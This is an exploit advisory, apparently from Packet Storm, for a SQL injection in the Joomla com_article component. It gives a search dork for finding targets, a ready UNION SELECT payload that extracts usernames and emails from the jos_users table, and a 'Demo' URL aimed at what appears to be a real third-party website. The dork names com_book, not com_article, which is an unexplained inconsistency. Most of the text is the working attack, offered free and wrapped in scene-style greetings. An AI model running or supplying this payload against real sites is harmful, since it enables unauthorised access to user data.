The Joomla Article component suffers from a remote SQL injection vulnerability.
a0efd9ff734c4264554f2248798da77b829067eb2def17fefbd6b2d01b761ea3==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] ~ Note : : <3 v4sploiter
==============================================================================
[»] Joomla (com_article) SQL injection Vulnerability
==============================================================================
[»] Script: [ Joomla Comp ]
[»] Language: [ PHP ]
[»] Dork: [ inurl:"com_book" ]
[»] Founder: [ Evil-Cod3r ]
[»] Gr44tz: [ v4sploiter - Mr.SaFa7 - Red Virus - Mn7os - Recruit - Mr.Skull ]
[»] Team: [ v4-Team.com/cc ]
[»] Price: [ Free ]
###########################################################################
http://localhost/path/index.php?option=com_article&id=Exploit
Exploit : -
index.php?option=com_article&id=-185 Union All Select concat(username,0x3a,email),2,3,4,5,6,7 from jos_users--
Demo :
http://www.utp.fr/index.php?option=com_article&id=-185%20Union%20All%20Select%20concat%28username,0x3a,email%29,2,3,4,5,6,7%20from%20jos_users--
Author: Evil-Cod3r
###########################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed